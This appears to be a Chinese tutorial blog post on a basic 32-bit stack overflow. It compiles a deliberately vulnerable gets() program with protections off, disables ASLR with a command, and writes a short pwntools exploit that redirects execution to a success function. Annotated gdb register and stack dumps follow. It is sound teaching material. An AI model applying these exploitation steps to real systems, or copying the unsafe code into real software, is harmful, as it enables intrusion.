目录

缓冲区

我们先以解决这个题目为准 然后通过这个题目去做透

gdb

代码段

 栈中

当前时刻寄存器存储的内容

1 寻找漏洞函数

输入

输出

字符串

2 确定填充长度

覆盖函数返回地址  

覆盖栈上变量的内容

覆盖bss段

栈溢出是在堆栈中 对某一个变量无限制的输入 超出了这个变量的字节数

从而导致了 超出这个变量本身的空间 覆盖到了上一个空间

这个是一个特定的缓冲区漏洞

缓冲区

缓冲区送内存中 存放临时输入输出的数据或者临时变量的区域

所以关于输入输出 所以是缓冲区漏洞

到此为止 我们能够发现 如果要实现栈溢出 有两个前提

（1）可以无限制的输入内容 （2）程序向栈中存入数据

使用wiki的例子

#include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); } void vulnerable() { char s[12]; gets(s); puts(s); return; } int main(int argc, char **argv) { vulnerable(); return 0; } gcc -m32 -fno-stack-protector stack_example.c -o stack_example -no-pie

使用gcc 对名为stack_example.c的文件进行编译

-m32 生成32位的程序 -fno-stack-protector 不生成堆栈溢出保护 canary -no-pie 不开启 pie保护 如果程序开启了PIE保护的话  
    
    
 ，在每次加载程序时都变换加载地址

     


     


     ，从而不能通过ROPgadget等一些工具来帮助解题

进行checksec查看

使用ubuntu 需要关闭aslr

临时关闭方法

echo 0 > /proc/sys/kernel/randomize_va_space

我们搞完这些 放入ida中看看 反编译

在VMware中安装新版Ubuntu后 




 




 




，无法跨虚拟机复制粘贴和拖拽文件的解决方法_ubuntu虚拟机不能粘贴复制_米修米修ne的博客-CSDN博客

这里给出最新版ubuntu 无法拖拽 vm都安装正常 还是不行的解决方法

 我们能发现反编译后 主函数就是我们写的主函数类型

 然后进入漏洞函数

同样的 

这里主要的是 gets函数 因为他可以无限制的输入内容 不检查输入的长度 只以回车为准

我们先以解决这个题目为准 然后通过这个题目去做透

发现s的长度为和ebp的距离位14

这里我们给出简易版流程图

 说明s的大小为14h

那么在32位中ebp的栈大小为 4个字节 所以如果我们要覆盖到 返回地址 就需要 14h+4h个字节

然后我们需要去找到返回的地址应该指向哪里

 shift+f12 得到controlled

发现success的地址

 源代码中也是success函数 就是我们的"shellcode"

所以我们开始运用pwntools写exp

from pwn import * p=process(./stack_example) payload=flat([bA*(0x14+0x04),0x08049186]) p.sendline(payload) p.interactive()

发现我们已经控制了

解决完这个入门题

我们开始解读

gdb

我们开始gdb 的调试 这里我们需要了解一些单词

registers ： 寄存器的状态

 这里是我们前面所学的寄存器 这里我来解释是什么意思

EAX: 0x80491e7 (<main>: push ebp) 这句话是 eax指向0x80491e7 它的内容是 把 ebp压入栈内 EBX: 0xf7e2a000 --> 0x229dac ebx存放的是 0xf7e2a000 --> 0x229dac这个值 这个可能是一个地址或者变量 ECX: 0xa0645a1a ecx存放的是xa0645a1a 也有可能是一个地址或者变量 EDX: 0xffffd140 --> 0xf7e2a000 --> 0x229dac edx中存放着0xffffd140 --> 0xf7e2a000 --> 0x229dac 的值 有可能是变量或地址 ESI: 0xffffd1d4 --> 0xffffd386 ("/root/下载/stack_example") esi存放 0xffffd1d4 --> 0xffffd386 内容是("/root/下载/stack_example") EDI: 0xf7ffcb80 --> 0x0 edi存放着0xf7ffcb80 --> 0x0 EBP: 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 ebp存放0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 ESP: 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 esp存放ESP: 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 EIP: 0x80491ea (<main+3>: and esp,0xfffffff0) eip存放0x80491ea 内容为 (<main+3>: and esp,0xfffffff0) 第一条指令 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 下面就是flags寄存器 然后判断有无溢出

代码段

0x80491e6 <vulnerable+53>: ret 在调用Vulnrable函数的时候的对于mian的返回地址 0x80491e7 <main>: push ebp 压入main的ebp 0x80491e8 <main+1>: mov ebp,esp 把esp的值赋值给ebp用来准备函数的栈帧 => 0x80491ea <main+3>: and esp,0xfffffff0 对esp取16倍的整数 用来栈对齐 0x80491ed <main+6>: call 0x8049203 <__x86.get_pc_thunk.ax> 调用函数<__x86.get_pc_thunk.ax> 取当前的地址 存储在eax中 0x80491f2 <main+11>: add eax,0x2e0e 为上面的地址继续加入偏移量得到 <vulnerable>函数的地址 0x80491f7 <main+16>: call 0x80491b1 <vulnerable> 调用函数Vulnrable 0x80491fc <main+21>: mov eax,0x0 把eax设置为0 这里执行完Vulnrable函数后 会通过ret执行 moveax,0x0这条指令

 栈中

[------------------------------------stack-------------------------------------] 0000| 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 这里 表示为第一个栈帧 0xffffd118 并且里面的内容是 由指针链组成 0xf7ffd020 0xf7ffda40 0x0 这里可能指向的是某个变量或函数调用地址 0004| 0xffffd11c --> 0xf7c21519 (<__libc_start_call_main+121>: add esp,0x10) 这里 表示为第二个栈帧 0xffffd11c 内容为 有一个指针 0xf7c21519 他的内容为 函数调用的内容 并且汇编为 add esp,0x10 这里是指向esp <__libc_start_call_main+121> 并且偏移量为12的地址 0008| 0xffffd120 --> 0x1 这里 表示为第三个栈帧 0xffffd120 为整数1 可能是某个标志 下面两个栈帧都是指向字符串 的 0012| 0xffffd124 --> 0xffffd1d4 --> 0xffffd386 ("/root/下载/stack_example") 0016| 0xffffd128 --> 0xffffd1dc --> 0xffffd3a1 ("SHELL=/bin/bash") 下面两个是指向相同地址的指针 0020| 0xffffd12c --> 0xffffd140 --> 0xf7e2a000 --> 0x229dac 0024| 0xffffd130 --> 0xf7e2a000 --> 0x229dac 0028| 0xffffd134 --> 0x80491e7 (<main>: push ebp) 最后一个栈帧 0xffffd134 指向了0x80491e7 内容为 压入ebp 这里是main函数的开始 压入上一个栈帧的ebp

当前时刻寄存器存储的内容

─────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────── *EAX 0x80491e7 (main) ◂— 0x83e58955 这里存储的 main函数的开始 0x83e58955表示从这个地址得到的main函数地址 *EBX 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac EBX存放着 (_GLOBAL_OFFSET_TABLE_) got表的地址 0x229dac为该地址的偏移量 *ECX 0xa19f0c5c ECX存放着 0xa19f0c5c *EDX 0xffffd140 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac EDX存放着0xffffd140 —▸ 0xf7e2a000 指针链 并且指向的是got表 偏移量为0x229dac *EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0 EDI存放着 0xf7ffcb80 内容是(_rtld_global_ro) 动态链接器 只要函数使用了共享库的内容 edi就会指向 共享库中的函数地址 *ESI 0xffffd1d4 —▸ 0xffffd386 ◂— 0x6f6f722f (/roo) ESI指针存放着指针链 并且是从另一个指针0x6f6f722f (/roo) 得到 *EBP 0xffffd118 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 ◂— 0x0 EBP指向0xffffd118 0xf7ffd020 0xf7ffda40 这三个指针 _rtld_global 是运行时链接器 (run-time linker) 的全局数据结构  

   

   

，用于跟踪动态链接库和符号解析等信息    
    
    
。 *ESP 0xffffd118 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 ◂— 0x0 ESP和EBP指向的是一样的 因为函数还没有开始 *EIP 0x80491ea (main+3) ◂— 0xe8f0e483 EIP指针指向 main+3的地址 作为下一条指令 ► 0x80491ea <main+3> and esp, 0xfffffff0 把esp的后四位清零 作为一个栈帧 0x80491ed <main+6> call __x86.get_pc_thunk.ax <__x86.get_pc_thunk.ax> 调用函数 0x80491f2 <main+11> add eax, 0x2e0e 把0x2e0e赋值给eax 0x80491f7 <main+16> call vulnerable <vulnerable> 开始调用函数 0x80491fc <main+21> mov eax, 0 把eax清零 0x8049201 <main+26> leave 退出main函数 0x8049202 <main+27> ret 从main函数返回 0x8049203 <__x86.get_pc_thunk.ax> mov eax, dword ptr [esp] 0x8049206 <__x86.get_pc_thunk.ax+3> ret 0x8049207 add bl, dh

这里我们发现 main函数也是一个被调用函数 他也有ret 并且在ret执行两次后会结束该程序

给出最后的结论

1 寻找漏洞函数

输入

gets

scanf

vscanf

输出

printf

字符串

strcpy 字符串复制

strcat 字符串拼接

bcopy 复制内存制定地址的前n个字符

2 确定填充长度

覆盖函数返回地址  

看ebp

覆盖栈上变量的内容

进行计算

覆盖bss段